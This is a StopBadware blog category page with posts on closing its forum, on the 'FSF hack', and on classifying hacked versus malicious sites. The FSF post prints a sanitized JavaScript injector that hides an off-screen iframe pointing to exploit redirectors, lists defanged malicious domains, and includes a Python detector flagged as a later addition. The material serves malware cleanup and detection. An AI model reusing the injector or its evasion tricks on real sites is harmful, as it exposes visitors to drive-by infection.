hacked sites | StopBadware

StopBadware shutting down community forum BadwareBusters.org

Posted on February 24, 2015 - 13:43 by ccondon

It's been nearly six years to the day since StopBadware and its partners launched BadwareBusters.org, our community platform for those who wanted to learn about and prevent badware. Over the years, the forum has helped thousands of website owners clean up hacked websites. Dozens of security experts have volunteered their time and talent to examine compromised sites, offer advice, and guide users to the best security resources for their needs. BadwareBusters has been exactly what it was intended to be when it launched in 2009: a place for our community to define its own needs, share stories, and learn from each other's experiences. 

At the end of this month, StopBadware will be shutting down the forum. We're terribly proud of all that our community has accomplished these past six years; we don't take lightly the decision to close up shop, but limited resources mean StopBadware is no longer able to maintain the forum in a way that's fair and productive for users. 

We're confident those seeking help with hacked sites and malware cleanup can find what they're searching for in places such as Google's malware forum, Bleeping Computer's forums, or Stack Exchange's community Q&As. StopBadware's hacked sites resources section also has useful tools and tutorials on finding and removing website malware, and longtime BadwareBusters moderator RedLeg maintains a gem of a site on website cleanup. 

Thanks for your participation and your wisdom. Keep learning.

'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from very bad places. We're referring to this as the FSF hack. 

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */
function JeckPostal() {
    // Gate on the user agent: every browser/platform in this list is skipped,
    // so the iframe is only written for the remaining (non-Chrome Windows desktop) browsers.
    var q = navigator.userAgent;
    var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 ||
             q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 ||
             q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1);
    if (!b) {
        // Tag name split across two string literals so a naive search for "<iframe" misses it;
        // the frame is positioned 700px off-screen so the visitor never sees it.
        document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>');
    }
}
JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 
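
As an added defender-side example (not code from this post or from RedLeg's writeup), the Python below scans a JavaScript file body for the indicators described above: the "2007 Free Software Foundation" comment at the top of the file, the split '<ifram'+'e' tag, the off-screen positioning, the user-agent gate, and hex-string labels in front of a domain. The sample inputs, the placeholder host 0badc0ffee.example.net, and the function names are constructed for the example.

```python
import re

# Indicator patterns taken from the sanitized snippet quoted above.
FAKE_FSF_HEADER = re.compile(
    r"/\*\s*Copyright \(C\) 2007 Free Software Foundation, Inc\.", re.I)
SPLIT_IFRAME = re.compile(r"""['"]<ifram['"]\s*\+\s*['"]e\b""", re.I)
OFFSCREEN_STYLE = re.compile(r"(?:left|top)\s*:\s*-\d{3,}px", re.I)
UA_GATE = re.compile(r"navigator\.userAgent")
# Hex-string label in front of the domain, as on the intermediary hosts listed above.
HEX_SUBDOMAIN = re.compile(r"https?://([0-9a-f]{8,}\.[a-z0-9-]+\.[a-z]{2,})", re.I)


def scan_js(source: str) -> dict:
    """Collect indicator hits for one JavaScript file body."""
    head = source[:512]  # the injection sits at the very start of the file
    return {
        "fake_fsf_header": bool(FAKE_FSF_HEADER.search(head)),
        "split_iframe_tag": bool(SPLIT_IFRAME.search(source)),
        "offscreen_style": bool(OFFSCREEN_STYLE.search(source)),
        "ua_gate": bool(UA_GATE.search(source)),
        "hex_subdomain_hosts": HEX_SUBDOMAIN.findall(source),
    }


def looks_like_fsf_hack(source: str) -> bool:
    """The header alone is not enough: genuine GPL-licensed files carry the same
    2007 FSF line. Flag only when it is paired with the hidden iframe writer."""
    hits = scan_js(source)
    return hits["fake_fsf_header"] and hits["split_iframe_tag"] and hits["offscreen_style"]


# Constructed samples (placeholder hosts), modelled on the snippet in the post.
INFECTED_JS = (
    "/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */ "
    "function JeckPostal() { var q = navigator.userAgent; "
    "var b = (q.indexOf(\"Chrome\") > -1 || q.indexOf(\"Android\") > -1); "
    "if (!b) { document.write('<ifram'+'e src=\"http://0badc0ffee.example.net/w.html\" "
    "style=\"position:absolute;left: -700px;top: -700px;\" height=\"132\" width=\"132\">"
    "</ifr'+'ame>'); } } JeckPostal(); /*\n"
    "var siteCode = 1;\n"
)
CLEAN_JS = (
    "/* Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/> */\n"
    "function ready(f) { document.addEventListener('DOMContentLoaded', f); }\n"
)

if __name__ == "__main__":
    for name, body in (("infected", INFECTED_JS), ("clean", CLEAN_JS)):
        print(name, looks_like_fsf_hack(body), scan_js(body)["hex_subdomain_hosts"])
```

To sweep a site, run scan_js over every .js file under the web root and review any file where looks_like_fsf_hack is true or hex_subdomain_hosts is non-empty.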

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!

Classifying sites as hacked or malicious

Posted on July 24, 2014 - 14:34 by ccondon

For the past several months, StopBadware's research team has been paying special attention to ways we can differentiate and track certain categories of infected websites. Thousands of website review requests are submitted to us every month; most of these are for hacked legitimate sites whose owners are concerned with cleaning up malware infections and protecting visitors. Some, however, are maliciously registered sites, or sites whose owners are abusing free hosting or dynamic DNS services to spread malware. When we encounter malicious sites like this, we want to make sure they stay on blacklists, and we want to be able to report them to people who can help take them down.

One of the first steps in doing that is developing a big picture understanding of the kinds of sites we encounter over time. Our team tracked the sites we tested manually (this is a relatively small percentage of the total number of review requests submitted to us) from late March to mid-July 2014. 

Because of the nature of infection chains, we differentiate between several types of sites when determining intention. Unsurprisingly, most of the sites we see are legitimate sites that have been hacked for use as landing pages (e.g., compromised with a malicious iframe, script, or HTTP redirect). Exploit pages, of course, are almost always malicious by design, as they contain the malicious executable that infects the target machine with badware. StopBadware sees very few exploit pages; this is largely a result of our testing IPs being blocked by malware distributors. 

Note: Generally speaking, we consider sites that fall into the "free host" category to be malicious. This is not necessarily a comment on the practices or intentions of free hosting (or other free service) providers—many of whom are operating in good faith and some of whom have worked with us for years to curb abuse on their platforms—but rather a result of the fact that bad actors routinely abuse free services to spread malware. 

The most interesting category we examined was intermediary pages. Our researchers classified intermediary sites as hacked or malicious by looking at a number of factors, including WHOIS data, the page's accessibility, and whether the site has legitimate content. This type of analysis is a common practice in the security industry, but it's also rather resource-intensive—especially for a small nonprofit. 

Ideally, we'd like to be able to automatically classify malicious websites so we can make the Web safer and minimize abuse of our processes at the same time. Over the next few weeks, our team will be using our data and a third-party service to come up with an experimental classifier for malicious vs. hacked sites. We look forward to sharing additional data and results once the project is finished; in the meantime, advice from those with experience in this arena is welcome! 

*Special thanks to our outstanding research and testing intern, Luke Oglesbee, for his work on this!